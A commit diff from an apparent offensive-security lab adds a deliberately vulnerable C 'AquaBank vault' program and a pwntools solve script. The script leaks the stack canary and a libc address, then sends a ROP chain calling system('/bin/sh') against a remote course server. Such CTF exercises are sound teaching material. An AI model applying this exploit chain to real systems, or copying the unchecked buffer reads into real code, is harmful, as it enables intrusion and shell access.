rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/lab3_4_recap/03_aquabank_vault/.gdb_history
+++ b/lab3_4_recap/03_aquabank_vault/.gdb_history
@@ -0,0 +1,6 @@
+r
+r
+r
+r
+vmmap
+quit
--- a/lab3_4_recap/03_aquabank_vault/aquabank-vault
+++ b/lab3_4_recap/03_aquabank_vault/aquabank-vault
--- a/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched
+++ b/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched
--- a/lab3_4_recap/03_aquabank_vault/ld-2.39.so
+++ b/lab3_4_recap/03_aquabank_vault/ld-2.39.so
--- a/lab3_4_recap/03_aquabank_vault/libc.so.6
+++ b/lab3_4_recap/03_aquabank_vault/libc.so.6
--- a/lab3_4_recap/03_aquabank_vault/main.c
+++ b/lab3_4_recap/03_aquabank_vault/main.c
@@ -0,0 +1,62 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+    puts("=== AquaBank Safe Deposit Vault ===");
+    puts("Insert your card to issue a receipt or open the vault.");
+}
+
+static void print_receipt(void) {
+    char buf[64];
+
+    puts("Type the receipt header (up to 64 chars):");
+    ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
+    if (n <= 0) return;
+
+    puts("--- RECEIPT ---");
+    fwrite(buf, 1, 256, stdout);
+    puts("");
+    puts("---------------");
+}
+
+static void open_vault(void) {
+    char combo[128];
+
+    puts("Enter your combination:");
+    (void)read(STDIN_FILENO, combo, 512);
+    printf("Combination registered: %.32s ...\n", combo);
+}
+
+static void menu(void) {
+    char line[16];
+    while (1) {
+        puts("");
+        puts("=== AquaBank Vault ===");
+        puts("1) Print receipt");
+        puts("2) Open vault");
+        puts("3) Exit");
+        printf("> "); fflush(stdout);
+        if (!fgets(line, sizeof(line), stdin)) break;
+        switch (atoi(line)) {
+            case 1: print_receipt(); break;
+            case 2: open_vault();    return;
+            case 3: puts("Bye");     return;
+            default: puts("?");
+        }
+    }
+}
+
+int main(void) {
+    setup();
+    banner();
+    menu();
+    return 0;
+}
--- a/lab3_4_recap/03_aquabank_vault/solve.py
+++ b/lab3_4_recap/03_aquabank_vault/solve.py
@@ -0,0 +1,125 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+exe = ELF("./aquabank-vault_patched")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process([exe.path])
+        if args.GDB:
+            gdb.attach(r)
+    else:
+        r = remote("offsec.m0lecon.it", 13533)
+
+    return r
+
+
+def main():
+    p = conn()
+    print(p.recvuntil(b"> "))
+    p.sendline(b"1")
+    print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n"))
+
+    p.sendline(b"A" * 64)
+    # p.sendline(b"A" * 1)
+    print(p.recvline())
+    # print(p.recvline()[64 + 8 : 64 + 16])
+    leak = p.recvline()
+    print(leak[64:])
+    canary = leak[64 + 8 : 64 + 16].strip()
+    # canary = canary[::-1]
+    # canary = int(canary, 16)
+    print(f"Canary:{canary} len: {len(canary)}")
+    p.recvuntil(b"> ")
+    p.sendline(b"2")
+    print(p.recvuntil(b"Enter your combination:\n"))
+    # p.interactive()
+    payload = flat(
+        # b"A" * 128,
+        b"A" * 136,
+        canary,
+        b"STOPHERE",
+        exe.symbols["print_receipt"],
+        exe.symbols["main"],
+    )
+    p.send(payload)
+    p.recvline()
+    # print(p.recvline())
+    # print(p.recvuntil(b"Enter your combination:\n"))
+    # print(p.recvuntil(b"> "))
+    # p.sendline(b"1")
+    # print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n"))
+    pause()
+    p.sendline(b"A" * 64)
+    p.recvline()
+    p.recvline()
+
+    first_leak = p.recvline()[64:].strip()
+    print(f"Leak: {first_leak} len: {len(first_leak)}")
+    leak = p.recvline().strip()
+    first_leak += leak
+    count = 0
+    addr = 0
+    for i in range(len(first_leak)):
+        if first_leak[i] == 0x7F:
+            addr_raw = first_leak[i : i - 6 : -1].strip()
+            addr = int.from_bytes(addr_raw, byteorder="big")
+            if count == 4:
+                print(f"Address: {hex(addr)}")
+                break
+            count = count + 1
+            # FIFTH INDEX (5)
+            # for i in range(23):
+    # print(f"Address - puts:{hex(addr - libc.symbols['puts'])}")
+    # print(f"Address - read:{hex(addr - libc.symbols['read'])}")
+    # print(f"Address - fwrite:{hex(addr - libc.symbols['fwrite'])}")
+    print(f"Address - start_main:{hex(addr - libc.symbols['__libc_start_main'] + 54)}")
+    libc.address = addr - libc.symbols["__libc_start_main"] + 54
+    print(p.recvuntil(b"> "))
+    p.sendline(b"2")
+    print(p.recvuntil(b"Enter your combination:\n"))
+    pop_rdi = 0x000000000010F78B
+    ret_libc = 0x000000000002882F
+    ret = 0x000000000040101A
+    BINSH = next(libc.search(b"/bin/sh\x00"))
+    ropchain = flat(
+        b"A" * 136,
+        canary,
+        p64(ret),
+        p64(libc.address + pop_rdi),
+        BINSH,
+        p64(ret),
+        # p64(libc.symbols["puts"]),
+        p64(libc.symbols["system"]),
+    )
+    p.sendline(ropchain)
+    p.interactive()
+    # print(f"Address - printf:{hex(addr - libc.symbols['printf'])}")
+    # print(f"Address - setvbuf:{hex(addr - libc.symbols['setvbuf'])}")
+    #    addr = first_leak[i * 8 : (i * 8) + 9]
+    #    addr = addr[::-1]
+    #    print(f"Address: {addr}")
+
+    # pause()
+    # p.sendline(b"A" * 1)
+    # leak = p.recvline()
+    # print(f"LEAK:{leak[64:]}")
+    # print(p.recvline())
+    # print(p.recvline())
+    # print(p.recvline()[64 + 8 : 64 + 16])
+    # leak = p.recvline()
+    # print(leak[64:])
+    # p.interactive()
+    # good luck pwning :)
+
+    # p.interactive()
+
+
+if __name__ == "__main__":
+    main()